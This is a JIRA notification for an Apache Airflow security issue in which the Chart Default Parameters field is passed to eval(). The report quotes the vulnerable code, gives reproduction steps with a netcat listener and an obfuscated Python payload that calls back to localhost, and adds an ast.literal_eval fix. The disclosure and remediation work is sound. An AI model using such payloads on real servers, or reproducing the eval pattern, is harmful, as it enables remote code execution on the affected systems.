Rui Wang created AIRFLOW-933:
--------------------------------

             Summary: Security - Airflow Use of Eval Allows for Remote Code Execution
                 Key: AIRFLOW-933
                 URL: https://issues.apache.org/jira/browse/AIRFLOW-933
             Project: Apache Airflow
          Issue Type: Bug
            Reporter: Rui Wang
            Assignee: Rui Wang


Impact: Any user with the ability to create or edit Charts may execute arbitrary 
code on the Airflow server.
Location: The Default Parameters form field sent when saving a Chart located at 
/admin/chart/new/
Description: The Chart functionality allows for the definition of Default 
Parameters, which are baseline constraints for the values within a chart.
This data is user-controllable and passed directly to a Python eval, which will 
execute code:
from flask import Markup, url_for

def label_link(v, c, m, p):
    # m.default_params is the text typed into the Chart's Default Parameters
    # field. eval() executes it as a Python expression, so any user who can
    # save a Chart runs code on the server.
    try:
        default_params = eval(m.default_params)
    except:
        default_params = {}
    url = url_for(
        'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
        **default_params)
    return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))

Reproduction Steps:
1. Configure a local instance of Airflow, and start a local netcat listener 
with the following shell command: nc -l 1337.
2. Access Airflow as a user able to create or edit Charts.
3. Browse to /admin/chart/new to bring up the UI for creating a Chart.
4. In its Default Parameters field, enter the following example payload:
  (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read(), 
None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, 
__g))]][0])(globals())

5. Save the Chart, and observe that the application has made a network request 
to your listener, indicating that your code has executed.
Remediation: Use the Python method ast.literal_eval 
(https://docs.python.org/3/library/ast.html#ast.literal_eval), which only 
builds Python literals (strings, numbers, lists, dicts, and so on) and raises 
on any call, attribute access, or name lookup, rather than executing the input 
as code. The result should also be checked to be a dict with string keys 
before it is splatted into url_for().
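The following is an added example, not code from the issue or from the Airflow project, showing the eval() pattern beside the literal_eval replacement described above. The benign dict, the harmless stand-in expression, and the function names are assumptions for illustration; the issue's original payload is only handed to ast.literal_eval here, never to eval().

```python
import ast

# Constructed sample inputs (not from the issue): what a chart author would
# legitimately type, and what an attacker types.
BENIGN = "{'ds': '2017-01-01', 'limit': 10}"
# Harmless stand-in for the netcat payload: eval() still executes it as code.
MALICIOUS = "__import__('os').getcwd()"
# The payload from the issue, verbatim (only passed to literal_eval below).
ISSUE_PAYLOAD = (
    "(lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read(), "
    "None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, "
    "__g))]][0])(globals())"
)


def eval_default_params(raw):
    """The vulnerable pattern: eval() on user-controlled text."""
    try:
        return eval(raw)
    except Exception:
        return {}


def parse_default_params(raw, max_len=4096):
    """Hardened replacement.

    ast.literal_eval only constructs literals; a Call, Attribute, Name or
    Lambda node raises ValueError (a syntax error raises SyntaxError).
    The result is then checked to be a dict with string keys, because it is
    splatted into url_for(**default_params).
    """
    if raw is None or not raw.strip():
        return {}
    if len(raw) > max_len:  # bound parser work on oversized input
        raise ValueError("default_params too long")
    try:
        value = ast.literal_eval(raw)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        raise ValueError("default_params must be a Python dict literal") from None
    if not isinstance(value, dict):
        raise ValueError("default_params must be a dict literal")
    if not all(isinstance(k, str) for k in value):
        raise ValueError("default_params keys must be strings")
    return value


def is_safe_literal_dict(raw):
    """Form-validator style check: True only if parse_default_params accepts raw."""
    try:
        parse_default_params(raw)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print("eval() on malicious input returned:", eval_default_params(MALICIOUS))
    print("literal_eval on benign input:", parse_default_params(BENIGN))
    for payload in (MALICIOUS, ISSUE_PAYLOAD):
        print("accepted?", is_safe_literal_dict(payload))
```

Note that the original code swallows every exception and falls back to {}; keeping that fallback with literal_eval is safe, but surfacing the ValueError to the Chart form tells the user why their Default Parameters were rejected.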



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)